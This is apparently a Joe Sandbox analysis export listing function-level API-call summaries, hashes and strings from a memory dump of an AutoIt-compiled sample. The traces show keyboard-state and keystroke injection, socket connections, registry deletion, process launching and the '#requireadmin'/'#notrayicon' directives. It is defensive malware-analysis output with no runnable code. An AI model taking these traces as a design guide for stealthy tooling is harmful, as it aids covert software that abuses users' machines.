                                                                • Part of subcall function 0048A7E9: _strlen.LIBCMT ref: 0048A7F3
                                                                • Part of subcall function 0048A7E9: _memmove.LIBCMT ref: 0048A815
                                                              • _strlen.LIBCMT ref: 004A6D44
                                                              • _memmove.LIBCMT ref: 004A6DAD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                              • String ID:
                                                              • API String ID: 3619996494-0
                                                              • Opcode ID: 1fa402e117b0d3f3e52b71ce301c2f2e9be84e03adafdc30ffd25e2c8d79ed9c
                                                              • Instruction ID: 97842a73a115c14b3fe46893fcebe13c1894bf375a181ea98407fac56a3d6bab
                                                              • Opcode Fuzzy Hash: 1fa402e117b0d3f3e52b71ce301c2f2e9be84e03adafdc30ffd25e2c8d79ed9c
                                                              • Instruction Fuzzy Hash: DF811371204300ABC710EF25CC82F6FB7A8AF99718F14491EF9559B292DB78ED05CB5A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6325a5255b2d047adc2b4ff66abde3e1510205c30aaf3a7ec9d00d6c0c7d954
                                                              • Instruction ID: 7a99f594a671cff4496a1e31a43c83454be5743964225531473a241505b7e79a
                                                              • Opcode Fuzzy Hash: b6325a5255b2d047adc2b4ff66abde3e1510205c30aaf3a7ec9d00d6c0c7d954
                                                              • Instruction Fuzzy Hash: 41716D30900109EFDB049F59CC44EBFBB75FF89314F14C15AF915AA261D738AA51CBA9
                                                              APIs
                                                              • IsWindow.USER32(01225850), ref: 004BB3EB
                                                              • IsWindowEnabled.USER32(01225850), ref: 004BB3F7
                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 004BB4DB
                                                              • SendMessageW.USER32(01225850,000000B0,?,?), ref: 004BB512
                                                              • IsDlgButtonChecked.USER32(?,?), ref: 004BB54F
                                                              • GetWindowLongW.USER32(01225850,000000EC), ref: 004BB571
                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 004BB589
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                              • String ID:
                                                              • API String ID: 4072528602-0
                                                              • Opcode ID: 8cf7ac7cf88a09bdb9915f658c892601558fa41f364ce0b7ac055592ad4927d8
                                                              • Instruction ID: d8a453c8a3edde3e178325bea40cf7334087b29106a434697276d08ea4b6a096
                                                              • Opcode Fuzzy Hash: 8cf7ac7cf88a09bdb9915f658c892601558fa41f364ce0b7ac055592ad4927d8
                                                              • Instruction Fuzzy Hash: D771AF34600604EFDB219F65CC90FFA7BB9FF09300F14416AEA4597362C7B9A851DBA8
                                                              APIs
                                                              • _memset.LIBCMT ref: 004AF448
                                                              • _memset.LIBCMT ref: 004AF511
                                                              • ShellExecuteExW.SHELL32(?), ref: 004AF556
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                                • Part of subcall function 0044FC86: _wcscpy.LIBCMT ref: 0044FCA9
                                                              • GetProcessId.KERNEL32(00000000), ref: 004AF5CD
                                                              • CloseHandle.KERNEL32(00000000), ref: 004AF5FC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                              • String ID: @
                                                              • API String ID: 3522835683-2766056989
                                                              • Opcode ID: a9440a0b2c825e2e671929c168f3d8ef1a3c6e90fba3b6066a28be5ae45c9419
                                                              • Instruction ID: 5012287a687a60197a9508148710a85b7bd9b8a14ae6b442ac1b96e38dcbf90c
                                                              • Opcode Fuzzy Hash: a9440a0b2c825e2e671929c168f3d8ef1a3c6e90fba3b6066a28be5ae45c9419
                                                              • Instruction Fuzzy Hash: 49619D75A006199FCB14EF99C8819AEBBB4FF59314F14806EE815AB351CB38AD45CF88
                                                              APIs
                                                              • GetParent.USER32(?), ref: 00490F8C
                                                              • GetKeyboardState.USER32(?), ref: 00490FA1
                                                              • SetKeyboardState.USER32(?), ref: 00491002
                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00491030
                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0049104F
                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00491095
                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004910B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: d9f4b88b9589d88af0590ca14ca51289f9592f89e52bdd9523a787278dae87bc
                                                              • Instruction ID: a75f5f9ad4dcca62971fe9efd3a38b6e143fec8d191a211e140075d2e9c5d1ce
                                                              • Opcode Fuzzy Hash: d9f4b88b9589d88af0590ca14ca51289f9592f89e52bdd9523a787278dae87bc
                                                              • Instruction Fuzzy Hash: 215113605047D23EFF3246348C05BBBBEA96B06304F0885AAE1D8459E3C2DDECC9D759
                                                              APIs
                                                              • GetParent.USER32(00000000), ref: 00490DA5
                                                              • GetKeyboardState.USER32(?), ref: 00490DBA
                                                              • SetKeyboardState.USER32(?), ref: 00490E1B
                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00490E47
                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00490E64
                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00490EA8
                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00490EC9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: 0195fdbb046c254981c742bc9c4da1fdbc4a02f4d8cb3564679b56c7f09e765b
                                                              • Instruction ID: 4a5ee3e947949bd3757bbdd3209144b7457c258604bdd4c56654a5780edc9580
                                                              • Opcode Fuzzy Hash: 0195fdbb046c254981c742bc9c4da1fdbc4a02f4d8cb3564679b56c7f09e765b
                                                              • Instruction Fuzzy Hash: F85116A05447D53DFF3287348C45B7B7FA95B06300F0889AEF1D8569C2C399AC88D758
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _wcsncpy$LocalTime
                                                              • String ID:
                                                              • API String ID: 2945705084-0
                                                              • Opcode ID: 5fc0b3aaf1b51797906deaf62732c300c8f59141064af65726842188690111c7
                                                              • Instruction ID: 4fb9d42a043a3f30d3e26782b2eb7186272a3354bfdbf9b3e36d4a24838c9ea4
                                                              • Opcode Fuzzy Hash: 5fc0b3aaf1b51797906deaf62732c300c8f59141064af65726842188690111c7
                                                              • Instruction Fuzzy Hash: AD41A766C1011476CB11EBB588469CFB7B8AF45315F60896BE908E3222F738E749C79E
                                                              APIs
                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0048D5D4
                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0048D60A
                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0048D61B
                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0048D69D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                              • String ID: ,,L$DllGetClassObject
                                                              • API String ID: 753597075-1523921096
                                                              • Opcode ID: 2874f49d8a31c27fa751d8fb05b92799712410cad7e6c20a8ff481bb29441fc2
                                                              • Instruction ID: 349aae52de480aa460380dd5ac828e1f768982ef7e7cb7ee11d629a544b569c0
                                                              • Opcode Fuzzy Hash: 2874f49d8a31c27fa751d8fb05b92799712410cad7e6c20a8ff481bb29441fc2
                                                              • Instruction Fuzzy Hash: 6441A4B1901208EFDB05EF54C884B9E7BA9EF44314F1185AEEC09AF245E7B4DD44CBA8
                                                              APIs
                                                                • Part of subcall function 0049466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00493697,?), ref: 0049468B
                                                                • Part of subcall function 0049466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00493697,?), ref: 004946A4
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 004936B7
                                                              • _wcscmp.LIBCMT ref: 004936D3
                                                              • MoveFileW.KERNEL32(?,?), ref: 004936EB
                                                              • _wcscat.LIBCMT ref: 00493733
                                                              • SHFileOperationW.SHELL32(?), ref: 0049379F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                              • String ID: \*.*
                                                              • API String ID: 1377345388-1173974218
                                                              • Opcode ID: e2733c519779d9b65c96e0fedb00e9f6905b8e651c1af57af1e4d438c6f40fd2
                                                              • Instruction ID: 162e92b7f90164ee15853b1d964996f1752bc3e01d24eb23056e8e57bd9ab906
                                                              • Opcode Fuzzy Hash: e2733c519779d9b65c96e0fedb00e9f6905b8e651c1af57af1e4d438c6f40fd2
                                                              • Instruction Fuzzy Hash: 544162B1508344AECB61EF65C4419DFBBE8AF89385F00097FF499C3251EA38D689C75A
                                                              APIs
                                                              • _memset.LIBCMT ref: 004B72AA
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004B7351
                                                              • IsMenu.USER32(?), ref: 004B7369
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004B73B1
                                                              • DrawMenuBar.USER32 ref: 004B73C4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                              • String ID: 0
                                                              • API String ID: 3866635326-4108050209
                                                              • Opcode ID: ee36f042df1874f920b0bbb297afc327899e50cf4300c362a36cb73739dc0f45
                                                              • Instruction ID: a9a4f53620497e76308fa1f7498c97d3e85104f82c28078ee9c245bce8d4ce8b
                                                              • Opcode Fuzzy Hash: ee36f042df1874f920b0bbb297afc327899e50cf4300c362a36cb73739dc0f45
                                                              • Instruction Fuzzy Hash: D0412675A04208EFDB20DF60D884AEABBF8FB48350F14952AFD05A7351D734AD64EB64
                                                              APIs
                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 004B0FD4
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004B0FFE
                                                              • FreeLibrary.KERNEL32(00000000), ref: 004B10B5
                                                                • Part of subcall function 004B0FA5: RegCloseKey.ADVAPI32(?), ref: 004B101B
                                                                • Part of subcall function 004B0FA5: FreeLibrary.KERNEL32(?), ref: 004B106D
                                                                • Part of subcall function 004B0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 004B1090
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 004B1058
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                              • String ID:
                                                              • API String ID: 395352322-0
                                                              • Opcode ID: 61c0abed08a93a8e6da0530a11321b67c3b893387271a684fe0f9d9921bb0bec
                                                              • Instruction ID: d4ecd12b5eb40bd1c66571d9cd27e4bd7114c3fca4b8a16b9ac38a0f82d530b3
                                                              • Opcode Fuzzy Hash: 61c0abed08a93a8e6da0530a11321b67c3b893387271a684fe0f9d9921bb0bec
                                                              • Instruction Fuzzy Hash: 2A312F71900109BFDB15AF94DC99EFFB7BCEF08300F40027AF505A2251D6745E899AB4
                                                              APIs
                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004B62EC
                                                              • GetWindowLongW.USER32(01225850,000000F0), ref: 004B631F
                                                              • GetWindowLongW.USER32(01225850,000000F0), ref: 004B6354
                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 004B6386
                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004B63B0
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 004B63C1
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004B63DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$MessageSend
                                                              • String ID:
                                                              • API String ID: 2178440468-0
                                                              • Opcode ID: 0b0474097472c1cd17a8540c9be5e062173b0066a9e4de0bd3213eb651dee428
                                                              • Instruction ID: f4a4fc16ae4343ea887edb61cd75ff9491ae658b4dfc8c66c0d02394d14d32e8
                                                              • Opcode Fuzzy Hash: 0b0474097472c1cd17a8540c9be5e062173b0066a9e4de0bd3213eb651dee428
                                                              • Instruction Fuzzy Hash: 943137306041409FDB20DF18DC84FA537E1FB4A754F1A11BAFA058F2B1CB79A854CB69
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0048DB2E
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0048DB54
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0048DB57
                                                              • SysAllocString.OLEAUT32(?), ref: 0048DB75
                                                              • SysFreeString.OLEAUT32(?), ref: 0048DB7E
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0048DBA3
                                                              • SysAllocString.OLEAUT32(?), ref: 0048DBB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: da34775877766735b572a9db42f43efcd8185900ce76160570483cceac7f3e52
                                                              • Instruction ID: 2187f6e717a7d66bbf3f6a0a9e2f5f7257932a774b8b25a39eb3472c40d66da1
                                                              • Opcode Fuzzy Hash: da34775877766735b572a9db42f43efcd8185900ce76160570483cceac7f3e52
                                                              • Instruction Fuzzy Hash: 91218336A01219AFDF10EFA9DC84CBF77ACEF09360B018536F918DB291D674AD458768
                                                              APIs
                                                                • Part of subcall function 004A7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 004A7DB6
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004A61C6
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A61D5
                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 004A620E
                                                              • connect.WSOCK32(00000000,?,00000010), ref: 004A6217
                                                              • WSAGetLastError.WSOCK32 ref: 004A6221
                                                              • closesocket.WSOCK32(00000000), ref: 004A624A
                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 004A6263
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 910771015-0
                                                              • Opcode ID: 9dd0fe60330ecde91c020a93366e7f3bdb002be972a7610e8613161cf5a2bfa0
                                                              • Instruction ID: 8fa5419178266e0d5b24b8523b1937883fa3c5572b70ce1f1540798a2d5bc72e
                                                              • Opcode Fuzzy Hash: 9dd0fe60330ecde91c020a93366e7f3bdb002be972a7610e8613161cf5a2bfa0
                                                              • Instruction Fuzzy Hash: E931D531600108AFDF10AF64CC85FBE7BADEF55714F05416AFD0997291DB78AC088B69
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                              • API String ID: 1038674560-2734436370
                                                              • Opcode ID: d4bf5794819108ff6e71bae4b85fa806236548b2b1ce15169dd0de2ecad6944c
                                                              • Instruction ID: 242dfe45fa957fa74ba49fd0407f8c63b2298afabebb5cc2bcdeeab72c12fb07
                                                              • Opcode Fuzzy Hash: d4bf5794819108ff6e71bae4b85fa806236548b2b1ce15169dd0de2ecad6944c
                                                              • Instruction Fuzzy Hash: 22216A7220451166E220BA35AC02FAF7398EF59744F50483FFC4296152FB9C9D4AD3AD
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0048DC09
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0048DC2F
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0048DC32
                                                              • SysAllocString.OLEAUT32 ref: 0048DC53
                                                              • SysFreeString.OLEAUT32 ref: 0048DC5C
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0048DC76
                                                              • SysAllocString.OLEAUT32(?), ref: 0048DC84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: 995f3ce5ca386c80d98d9bf14164a1060eb85196412dcd609994b8cdda6404d6
                                                              • Instruction ID: 0bc83bf6e5ffc0cba7bb0bffc23b1522e91ffc161a6c7958de31b8d47501958e
                                                              • Opcode Fuzzy Hash: 995f3ce5ca386c80d98d9bf14164a1060eb85196412dcd609994b8cdda6404d6
                                                              • Instruction Fuzzy Hash: C3215635A05204AFAB10FFA8DC89DAF77ECEB09360B108536F914CB2A1D674EC45D768
                                                              APIs
                                                                • Part of subcall function 00431D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00431D73
                                                                • Part of subcall function 00431D35: GetStockObject.GDI32(00000011), ref: 00431D87
                                                                • Part of subcall function 00431D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00431D91
